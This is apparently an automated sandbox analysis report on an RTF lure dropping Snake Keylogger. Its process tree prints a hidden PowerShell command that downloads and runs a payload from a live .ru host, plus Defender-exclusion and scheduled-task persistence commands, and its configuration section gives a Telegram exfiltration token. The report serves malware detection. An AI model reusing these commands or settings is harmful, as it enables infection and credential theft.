Edit tour

Windows Analysis Report
Revised sales contract for Crosswear.rtf

Overview

General Information

Sample Name:	Revised sales contract for Crosswear.rtf
Analysis ID:	688701
MD5:	74ab9855f26b0cc2fca1fefd566f5642
SHA1:	09ebb7681f9989b7e98a17cbbff3cd7783712874
SHA256:	cda65753e2459754b1afd749ac2ce1c65415de966179e9bb53e822321c02c7ff
Tags:	rtf
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

Document exploit detected (drops PE files)

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Yara detected AntiVM3

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (creates forbidden files)

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Microsoft Office creates scripting files

Tries to steal Mail credentials (via file / registry access)

Office process drops PE file

Injects files into Windows application

Document contains OLE streams with names of living off the land binaries

Tries to harvest and steal ftp login credentials

.NET source code references suspicious native API functions

Bypasses PowerShell execution policy

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to download and execute files (via powershell)

Suspicious powershell command line found

Document contains a stream with embedded javascript code

May check the online IP address of the machine

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Powershell drops PE file

Yara detected Generic Downloader

Machine Learning detection for dropped file

Adds a directory exclusion to Windows Defender

Found suspicious RTF objects

Document exploit detected (process start blacklist hit)

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Yara detected Credential Stealer

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Uses a known web browser user agent for HTTP communication

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2728 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

powershell.exe (PID: 2016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 2348 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

mum.exe (PID: 1724 cmdline: C:\Users\user\AppData\Roaming\mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02)

powershell.exe (PID: 1808 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

schtasks.exe (PID: 1916 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpEFF.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

mum.exe (PID: 2588 cmdline: C:\Users\user\AppData\Roaming\mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02)

powershell.exe (PID: 2572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 1672 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

mum.exe (PID: 2520 cmdline: C:\Users\user\AppData\Roaming\mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02)

powershell.exe (PID: 2864 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

schtasks.exe (PID: 2940 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmp430A.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

mum.exe (PID: 2024 cmdline: C:\Users\user\AppData\Roaming\mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02)

mum.exe (PID: 1484 cmdline: C:\Users\user\AppData\Roaming\mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02)

svchost.exe (PID: 2024 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)

powershell.exe (PID: 684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 1732 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

mum.exe (PID: 2708 cmdline: C:\Users\user\AppData\Roaming\mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02)

powershell.exe (PID: 1920 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

schtasks.exe (PID: 544 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpA5B2.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

mum.exe (PID: 828 cmdline: C:\Users\user\AppData\Roaming\mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02)

verclsid.exe (PID: 772 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)

notepad.exe (PID: 2940 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT MD5: B32189BDFF6E577A92BAA61AD49264E6)

cleanup

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram Token": "5653882710:AAFqiub7KKNl9WuwdcBa3Hc2Wwy7UHDnsWc", "Telegram ID": "1120598411"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Revised sales contract for Crosswear.rtf	INDICATOR_RTF_Exploit_Scripting	detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.	ditekSHen	0xb5da:$clsid2: 0003000000000000C000000000000046 0xad38:$ole6: D0Cf11E 0x955:$obj2: \objdata 0xaced:$obj2: \objdata 0xacd9:$obj3: \objupdate 0xac54:$obj4: \objemb 0xc258:$obj4: \objemb 0xac43:$obj6: \objlink 0xa68:$sct1: 33 43 37 33 36 33 37 32 36 39 37 30 37 34 36 43 36 35 35 34 0x8426:$sct2: 35 37 35 33 36 33 37 32 36 39 37 30 37 34 32 45 35 33 36 38 36 35 36 43 36 43
Revised sales contract for Crosswear.rtf	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x955:$obj2: \objdata 0xaced:$obj2: \objdata 0xacd9:$obj3: \objupdate 0xac54:$obj4: \objemb 0xc258:$obj4: \objemb 0xac43:$obj6: \objlink

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.937156653.0000000000240000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x324c:$s3: System.Net.WebClient).DownloadFile('httP
00000009.00000002.937156653.0000000000240000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x279a:$sb1: -W Hidden 0x320b:$sb1: -W Hidden 0x277a:$sc1: -NoP 0x31fb:$sc1: -NoP 0x278e:$sd1: -NonI 0x3205:$sd1: -NonI 0x27ae:$se3: -ExecutionPolicy bypass 0x3215:$se3: -ExecutionPolicy bypass 0x2784:$sf1: -sta 0x3200:$sf1: -sta
00000004.00000002.914867466.00000000001FF000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0xe869:$s3: System.Net.WebClient).DownloadFile('httP
00000004.00000002.915030344.0000000001B26000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x949:$s3: System.Net.WebClient).DownloadFile('httP
00000004.00000002.914809669.0000000000150000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x324c:$s3: System.Net.WebClient).DownloadFile('httP
00000004.00000002.914809669.0000000000150000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x279a:$sb1: -W Hidden 0x320b:$sb1: -W Hidden 0x277a:$sc1: -NoP 0x31fb:$sc1: -NoP 0x278e:$sd1: -NonI 0x3205:$sd1: -NonI 0x27ae:$se3: -ExecutionPolicy bypass 0x3215:$se3: -ExecutionPolicy bypass 0x2784:$sf1: -sta 0x3200:$sf1: -sta
00000012.00000002.962416931.000000000026E000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x3bf99:$s3: System.Net.WebClient).DownloadFile('httP
00000009.00000002.937588508.0000000001C56000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x949:$s3: System.Net.WebClient).DownloadFile('httP
00000008.00000002.962351507.0000000002752000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000012.00000002.964450317.0000000001B86000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x949:$s3: System.Net.WebClient).DownloadFile('httP
0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18624:$x1: $%SMTPDV$ 0x172ea:$x2: $#TheHashHere%& 0x185cc:$x3: %FTPDV$ 0x172cc:$x4: $%TelegramDv$ 0x14c6e:$x5: KeyLoggerEventArgs 0x15004:$x5: KeyLoggerEventArgs 0x18650:$m1: \| Snake Keylogger 0x186f6:$m1: \| Snake Keylogger 0x1884a:$m1: \| Snake Keylogger 0x18970:$m1: \| Snake Keylogger 0x18aca:$m1: \| Snake Keylogger 0x185f0:$m2: Clipboard Logs ID 0x18800:$m2: Screenshot Logs ID 0x18914:$m2: keystroke Logs ID 0x18b00:$m3: SnakePW 0x187d8:$m4: \SnakeKeylogger\
0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13a53:$a1: get_encryptedPassword 0x13d3f:$a2: get_encryptedUsername 0x1385f:$a3: get_timePasswordChanged 0x1395a:$a4: get_passwordField 0x13a69:$a5: set_encryptedPassword 0x150a1:$a7: get_logins 0x15004:$a10: KeyLoggerEventArgs 0x14c6e:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.937344564.00000000002F2000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x1fd29:$s3: System.Net.WebClient).DownloadFile('httP
00000012.00000002.962331313.0000000000230000.00000004.00000020.00020000.00000000.sdmp	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x324c:$s3: System.Net.WebClient).DownloadFile('httP
00000012.00000002.962331313.0000000000230000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x279a:$sb1: -W Hidden 0x320b:$sb1: -W Hidden 0x277a:$sc1: -NoP 0x31fb:$sc1: -NoP 0x278e:$sd1: -NonI 0x3205:$sd1: -NonI 0x27ae:$se3: -ExecutionPolicy bypass 0x3215:$se3: -ExecutionPolicy bypass 0x2784:$sf1: -sta 0x3200:$sf1: -sta
00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x79bf4:$x1: $%SMTPDV$ 0x1d8954:$x1: $%SMTPDV$ 0x1f8374:$x1: $%SMTPDV$ 0x788ba:$x2: $#TheHashHere%& 0x1d761a:$x2: $#TheHashHere%& 0x1f703a:$x2: $#TheHashHere%& 0x79b9c:$x3: %FTPDV$ 0x1d88fc:$x3: %FTPDV$ 0x1f831c:$x3: %FTPDV$ 0x7889c:$x4: $%TelegramDv$ 0x1d75fc:$x4: $%TelegramDv$ 0x1f701c:$x4: $%TelegramDv$ 0x7623e:$x5: KeyLoggerEventArgs 0x765d4:$x5: KeyLoggerEventArgs 0x1d4f9e:$x5: KeyLoggerEventArgs 0x1d5334:$x5: KeyLoggerEventArgs 0x1f49be:$x5: KeyLoggerEventArgs 0x1f4d54:$x5: KeyLoggerEventArgs 0x79c20:$m1: \| Snake Keylogger 0x79cc6:$m1: \| Snake Keylogger 0x79e1a:$m1: \| Snake Keylogger
00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x75023:$a1: get_encryptedPassword 0x1d3d83:$a1: get_encryptedPassword 0x1f37a3:$a1: get_encryptedPassword 0x7530f:$a2: get_encryptedUsername 0x1d406f:$a2: get_encryptedUsername 0x1f3a8f:$a2: get_encryptedUsername 0x74e2f:$a3: get_timePasswordChanged 0x1d3b8f:$a3: get_timePasswordChanged 0x1f35af:$a3: get_timePasswordChanged 0x74f2a:$a4: get_passwordField 0x1d3c8a:$a4: get_passwordField 0x1f36aa:$a4: get_passwordField 0x75039:$a5: set_encryptedPassword 0x1d3d99:$a5: set_encryptedPassword 0x1f37b9:$a5: set_encryptedPassword 0x76671:$a7: get_logins 0x1d53d1:$a7: get_logins 0x1f4df1:$a7: get_logins 0x765d4:$a10: KeyLoggerEventArgs 0x1d5334:$a10: KeyLoggerEventArgs 0x1f4d54:$a10: KeyLoggerEventArgs
Process Memory Space: powershell.exe PID: 2016	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0xb6a04:$sa2: -encodedCommand 0xb6fb9:$sa2: -EncodedCommand 0xb76f3:$sa2: -EncodedCommand 0xb778a:$sa2: -encodedCommand 0x99feb:$sb1: -W Hidden 0x9a1f2:$sb1: -W Hidden 0x9a2ed:$sb1: -W Hidden 0x99fdb:$sc1: -NoP 0x9a1e2:$sc1: -NoP 0x9a2dd:$sc1: -NoP 0xb6db4:$sc2: -NoProfile 0x80448:$sd1: -NonI 0x827e6:$sd1: -NonI 0x99fe5:$sd1: -NonI 0x9a1ec:$sd1: -NonI 0x9a2e7:$sd1: -NonI 0xb35e8:$sd1: -NonI 0xdd02f:$sd1: -NonI 0xb6de3:$sd2: -NonInteractive 0x80455:$se3: -ExecutionPolicy bypass 0x827f3:$se3: -ExecutionPolicy bypass
Process Memory Space: mum.exe PID: 1724	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: mum.exe PID: 1724	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: mum.exe PID: 1724	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: mum.exe PID: 1724	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1b1135:$x5: KeyLoggerEventArgs 0x1b14cb:$x5: KeyLoggerEventArgs 0x1b1e01:$x5: KeyLoggerEventArgs 0x1b2162:$x5: KeyLoggerEventArgs 0x1b360b:$m1: \| Snake Keylogger 0x1b365a:$m1: \| Snake Keylogger 0x1b36ee:$m1: \| Snake Keylogger 0x1b374f:$m1: \| Snake Keylogger 0x1b37c4:$m1: \| Snake Keylogger 0x1b35da:$m2: Clipboard Logs ID 0x1b36c9:$m2: Screenshot Logs ID 0x1b3721:$m2: keystroke Logs ID 0x1b37df:$m3: SnakePW 0x1b36b5:$m4: \SnakeKeylogger\
Process Memory Space: mum.exe PID: 1724	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1af14a:$a1: get_encryptedPassword 0x1af42c:$a2: get_encryptedUsername 0x1aef60:$a3: get_timePasswordChanged 0x1af05b:$a4: get_passwordField 0x1af160:$a5: set_encryptedPassword 0x1b1568:$a7: get_logins 0x1b14cb:$a10: KeyLoggerEventArgs 0x1b1135:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: powershell.exe PID: 2572	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x2542:$s3: System.Net.WebClient).DownloadFile('httP 0x27a5:$s3: System.Net.WebClient).DownloadFile('httP 0x28a0:$s3: System.Net.WebClient).DownloadFile('httP 0x7cef:$s3: System.Net.WebClient).DownloadFile('httP 0xd104:$s3: System.Net.WebClient).DownloadFile('httP 0x5dbd0:$s3: System.Net.WebClient).DownloadFile('httP 0x5dcbe:$s3: System.Net.WebClient).DownloadFile('httP 0x79d0f:$s3: System.Net.WebClient).DownloadFile('httP 0x90fb8:$s3: System.Net.WebClient).DownloadFile('httP 0x910a7:$s3: System.Net.WebClient).DownloadFile('httP 0xa062e:$s3: System.Net.WebClient).DownloadFile('httP 0xa2449:$s3: System.Net.WebClient).DownloadFile('httP
Process Memory Space: powershell.exe PID: 2572	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x7cfe3:$sa2: -encodedCommand 0x7d598:$sa2: -EncodedCommand 0x7dcd2:$sa2: -EncodedCommand 0x7dd69:$sa2: -encodedCommand 0x2501:$sb1: -W Hidden 0x2764:$sb1: -W Hidden 0x285f:$sb1: -W Hidden 0x24f1:$sc1: -NoP 0x2754:$sc1: -NoP 0x284f:$sc1: -NoP 0x7d393:$sc2: -NoProfile 0x24fb:$sd1: -NonI 0x275e:$sd1: -NonI 0x2859:$sd1: -NonI 0x13ccd:$sd1: -NonI 0x5db8d:$sd1: -NonI 0x79cca:$sd1: -NonI 0x90f94:$sd1: -NonI 0x7d3c2:$sd2: -NonInteractive 0x250b:$se3: -ExecutionPolicy bypass 0x276e:$se3: -ExecutionPolicy bypass
Process Memory Space: mum.exe PID: 2588	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: mum.exe PID: 2588	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: mum.exe PID: 2588	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1bcd1:$x5: KeyLoggerEventArgs 0x1c067:$x5: KeyLoggerEventArgs 0x1c99d:$x5: KeyLoggerEventArgs 0x1ccfe:$x5: KeyLoggerEventArgs 0x1e1a7:$m1: \| Snake Keylogger 0x1e1f6:$m1: \| Snake Keylogger 0x1e28a:$m1: \| Snake Keylogger 0x1e2eb:$m1: \| Snake Keylogger 0x1e360:$m1: \| Snake Keylogger 0x1e176:$m2: Clipboard Logs ID 0x1e265:$m2: Screenshot Logs ID 0x1e2bd:$m2: keystroke Logs ID 0x1e37b:$m3: SnakePW 0x1e251:$m4: \SnakeKeylogger\
Process Memory Space: mum.exe PID: 2588	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x19ce6:$a1: get_encryptedPassword 0x19fc8:$a2: get_encryptedUsername 0x19afc:$a3: get_timePasswordChanged 0x19bf7:$a4: get_passwordField 0x19cfc:$a5: set_encryptedPassword 0x1c104:$a7: get_logins 0x1c067:$a10: KeyLoggerEventArgs 0x1bcd1:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: powershell.exe PID: 684	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x8f8:$s3: System.Net.WebClient).DownloadFile('httP 0x5217:$s3: System.Net.WebClient).DownloadFile('httP 0x32820:$s3: System.Net.WebClient).DownloadFile('httP 0x386f8:$s3: System.Net.WebClient).DownloadFile('httP 0x3ccc6:$s3: System.Net.WebClient).DownloadFile('httP 0x3e21b:$s3: System.Net.WebClient).DownloadFile('httP 0x3e30a:$s3: System.Net.WebClient).DownloadFile('httP 0x76c54:$s3: System.Net.WebClient).DownloadFile('httP 0x76d42:$s3: System.Net.WebClient).DownloadFile('httP 0x9634e:$s3: System.Net.WebClient).DownloadFile('httP 0x965af:$s3: System.Net.WebClient).DownloadFile('httP 0x966aa:$s3: System.Net.WebClient).DownloadFile('httP
Process Memory Space: powershell.exe PID: 684	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x35bf8:$sa2: -encodedCommand 0x361ad:$sa2: -EncodedCommand 0x368e7:$sa2: -EncodedCommand 0x3697e:$sa2: -encodedCommand 0x9630d:$sb1: -W Hidden 0x9656e:$sb1: -W Hidden 0x96669:$sb1: -W Hidden 0x962fd:$sc1: -NoP 0x9655e:$sc1: -NoP 0x96659:$sc1: -NoP 0x35fa8:$sc2: -NoProfile 0x327db:$sd1: -NonI 0x3dcf9:$sd1: -NonI 0x76c11:$sd1: -NonI 0x96307:$sd1: -NonI 0x96568:$sd1: -NonI 0x96663:$sd1: -NonI 0x35fd7:$sd2: -NonInteractive 0x327e8:$se3: -ExecutionPolicy bypass 0x3e1e5:$se3: -ExecutionPolicy bypass 0x76c1e:$se3: -ExecutionPolicy bypass
Process Memory Space: mum.exe PID: 1484	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: mum.exe PID: 828	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 35 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
15.0.mum.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b136:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a31f:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a766:$a4: \Orbitum\User Data\Default\Login Data 0x1b8e7:$a5: \Kometa\User Data\Default\Login Data
15.0.mum.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
15.0.mum.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.0.mum.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.0.mum.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.0.mum.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x147f9:$s1: UnHook 0x14800:$s2: SetHook 0x14808:$s3: CallNextHook 0x14815:$s4: _hook
15.0.mum.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18824:$x1: $%SMTPDV$ 0x174ea:$x2: $#TheHashHere%& 0x187cc:$x3: %FTPDV$ 0x174cc:$x4: $%TelegramDv$ 0x14e6e:$x5: KeyLoggerEventArgs 0x15204:$x5: KeyLoggerEventArgs 0x18850:$m1: \| Snake Keylogger 0x188f6:$m1: \| Snake Keylogger 0x18a4a:$m1: \| Snake Keylogger 0x18b70:$m1: \| Snake Keylogger 0x18cca:$m1: \| Snake Keylogger 0x187f0:$m2: Clipboard Logs ID 0x18a00:$m2: Screenshot Logs ID 0x18b14:$m2: keystroke Logs ID 0x18d00:$m3: SnakePW 0x189d8:$m4: \SnakeKeylogger\
15.0.mum.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13c53:$a1: get_encryptedPassword 0x13f3f:$a2: get_encryptedUsername 0x13a5f:$a3: get_timePasswordChanged 0x13b5a:$a4: get_passwordField 0x13c69:$a5: set_encryptedPassword 0x152a1:$a7: get_logins 0x15204:$a10: KeyLoggerEventArgs 0x14e6e:$a11: KeyLoggerEventArgsEventHandler
8.2.mum.exe.3859130.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19336:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1851f:$a3: \Google\Chrome\User Data\Default\Login Data 0x18966:$a4: \Orbitum\User Data\Default\Login Data 0x19ae7:$a5: \Kometa\User Data\Default\Login Data
8.2.mum.exe.3859130.8.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.mum.exe.3859130.8.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.mum.exe.3859130.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.mum.exe.3859130.8.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x129f9:$s1: UnHook 0x12a00:$s2: SetHook 0x12a08:$s3: CallNextHook 0x12a15:$s4: _hook
8.2.mum.exe.3859130.8.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16a24:$x1: $%SMTPDV$ 0x156ea:$x2: $#TheHashHere%& 0x169cc:$x3: %FTPDV$ 0x156cc:$x4: $%TelegramDv$ 0x1306e:$x5: KeyLoggerEventArgs 0x13404:$x5: KeyLoggerEventArgs 0x16a50:$m1: \| Snake Keylogger 0x16af6:$m1: \| Snake Keylogger 0x16c4a:$m1: \| Snake Keylogger 0x16d70:$m1: \| Snake Keylogger 0x16eca:$m1: \| Snake Keylogger 0x169f0:$m2: Clipboard Logs ID 0x16c00:$m2: Screenshot Logs ID 0x16d14:$m2: keystroke Logs ID 0x16f00:$m3: SnakePW 0x16bd8:$m4: \SnakeKeylogger\
8.2.mum.exe.3859130.8.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x11e53:$a1: get_encryptedPassword 0x1213f:$a2: get_encryptedUsername 0x11c5f:$a3: get_timePasswordChanged 0x11d5a:$a4: get_passwordField 0x11e69:$a5: set_encryptedPassword 0x134a1:$a7: get_logins 0x13404:$a10: KeyLoggerEventArgs 0x1306e:$a11: KeyLoggerEventArgsEventHandler
8.2.mum.exe.26dfd64.3.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
8.2.mum.exe.26dfd64.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0x12212:$v1: SbieDll.dll 0x12266:$v2: USER 0x12272:$v3: SANDBOX 0x12248:$v4: VIRUS 0x12286:$v4: VIRUS 0x122c2:$v5: MALWARE 0x122ae:$v6: SCHMIDTI 0x122d4:$v7: CURRENTUSER
